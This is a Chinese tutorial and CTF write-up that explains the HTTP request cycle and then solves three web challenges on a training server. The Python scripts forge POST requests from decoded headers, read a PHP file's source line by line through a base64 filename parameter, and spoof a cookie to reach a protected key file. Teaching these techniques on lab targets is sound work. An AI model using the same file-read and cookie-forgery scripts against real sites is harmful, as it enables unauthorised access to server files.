其實一直想出一篇文章詳解Http請求的,但是本人現在沒有把握寫的通俗易懂,但Http請求對于web至為重要,所以請萌新們不要浮躁,耐心看完Woo__dalao寫的Http請求。
鄭重聲明:以下圖片和文字來自一篇文章帶你詳解 HTTP 協議一文
Http協議概述
HTTP協議(HyperText Transfer Protocol,超文本傳輸協議)是用于從WWW服務器傳輸超文本到本地瀏覽器的傳輸協議。它可以使瀏覽器更加高效,使網絡傳輸減少。它不僅保證計算機正確快速地傳輸超文本文檔,還確定傳輸文檔中的哪一部分,以及哪部分內容首先顯示(如文本先于圖形)等。
HTTP 工作過程
- 建立 TCP 連接
在HTTP工作開始之前,客戶端首先要通過網絡與服務器建立連接,該連接是通過 TCP 來完成的,該協議與 IP 協議共同構建 Internet,即著名的 TCP/IP 協議族,因此 Internet 又被稱作是 TCP/IP 網絡。HTTP 是比 TCP 更高層次的應用層協議,根據規則,只有低層協議建立之后,才能進行高層協議的連接,因此,首先要建立 TCP 連接,一般 TCP 連接的端口號是80;- 客戶端向服務器發送請求命令
一旦建立了TCP連接,客戶端就會向服務器發送請求命令;
例如:GET/sample/hello.jsp HTTP/1.1- 客戶端發送請求頭信息
客戶端發送其請求命令之后,還要以頭信息的形式向服務器發送一些別的信息,之后客戶端發送了一空白行來通知服務器,它已經結束了該頭信息的發送;- 服務器應答
客戶端向服務器發出請求后,服務器會客戶端返回響應;
例如: HTTP/1.1 200 OK
響應的第一部分是協議的版本號和響應狀態碼- 服務器返回響應頭信息
正如客戶端會隨同請求發送關于自身的信息一樣,服務器也會隨同響應向用戶發送關于它自己的數據及被請求的文檔;- 服務器向客戶端發送數據
服務器向客戶端發送頭信息后,它會發送一個空白行來表示頭信息的發送到此為結束,接著,它就以 Content-Type 響應頭信息所描述的格式發送用戶所請求的實際數據;- 服務器關閉 TCP 連接
一般情況下,一旦服務器向客戶端返回了請求數據,它就要關閉 TCP 連接,然后如果客戶端或者服務器在其頭信息加入了這行代碼 Connection:keep-alive ,TCP 連接在發送后將仍然保持打開狀態,于是,客戶端可以繼續通過相同的連接發送請求。保持連接節省了為每個請求建立新連接所需的時間,還節約了網絡帶寬。
對于Http報文客戶端向服務器發送請求命令部分,讓我們用一個簡單的例子解析HTTP 協議報文結構
ps:這里推薦chorme瀏覽器的postman插件用來模擬http請求哦~
請求報文 POST /form/entry HTTP/1.1
響應報文 HTTP/1.1 200 OK
應用場景:在alert框中尋找flag
postman設置為Get請求,截獲報文請求主體
咋一看最后一行長得像flag,我們抽一行看看轉換編碼試試,
咦~flag竟然躺在這里
選擇unicode轉ASCALL
應用場景 偽造post請求
Test1:在x-www-form-urlencoded
中填入
查找到的margin值
Result1:回顯更新,有戲
查看分配給瀏覽器的headers,flag躺在這里
Test2:提交題目發現不正確,多次post報文段發現
flag -> 6LeR55qE6L+Y5LiN6ZSZ77yM57uZ5L2gZmxhZ+WQpzog
固定不變,但隨后的字符串是隨機生成的.應該是base64格式加密過了flag
Result2:
Test3:根據上述還是不行,根源在于字符串是隨機生成的,所以flag也是隨機的,基于python2.7模擬Http請求
post.py
import requests
import base64
url = 'http://120.24.86.145:8002/web6/'
req = requests.session()
res = req.get(url)
flag = res.headers['flag']
txt = base64.b64decode(flag)
txt = txt[txt.index(":"):]
#找到:的前一個位置,從之后索引間隔一個位置向后掃描
txt = base64.b64decode(txt)
data = {'margin': txt}
ans = req.post(url,data)
print(ans.content)
Result3:拿到flag
應用場景 Cookies欺騙
Test1:通過postman解析請求報文,使用base64解密,filename=keys.txt
觀察到URL下存在index.php,修改filename=index.php,未回顯。修改line字段同上
Result1
Test2:基于python2.7,限定line參數范圍為40個,獲取index.php
import requests
import base64
url1 = 'http://120.24.86.145:8002/web11/index.php?line='
url2 = '&filename='
filename = base64.b64encode("index.php")
req = requests.session()
for line in range(0, 40):
url = url1 + str(line) + url2 + filename
print req.get(url).content
Result2 index.php
要求filename=keys.php,且要驗證cookies中的margin參數值為margin
D:\python27\python.exe F:/pythonProject/TestRun/Test.py
<?php
error_reporting(0);
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:"");
$line=isset($_GET['line'])?intval($_GET['line']):0;
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ=");
$file_list = array( '0' =>'keys.txt', '1' =>'index.php', );
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>
Test3:驗證Cookies中的margin以及filename參數
import requests
import base64
url1 = 'http://120.24.86.145:8002/web11/index.php?line='
url2 = '&filename='
filename = base64.b64encode("index.php")
req = requests.session()
# for line in range(0, 40):
# url = url1 + str(line) + url2 + filename
# print req.get(url).content
filename = base64.b64encode("keys.php")
url = url1 + str(0) + url2 + filename
print req.get(url, cookies={'margin': 'margin'}).content
Result3:返回含有flag的php腳本
D:\python27\python.exe F:/pythonProject/TestRun/Test.py
<?php $key='KEY{key_keys}'; ?>
Process finished with exit code 0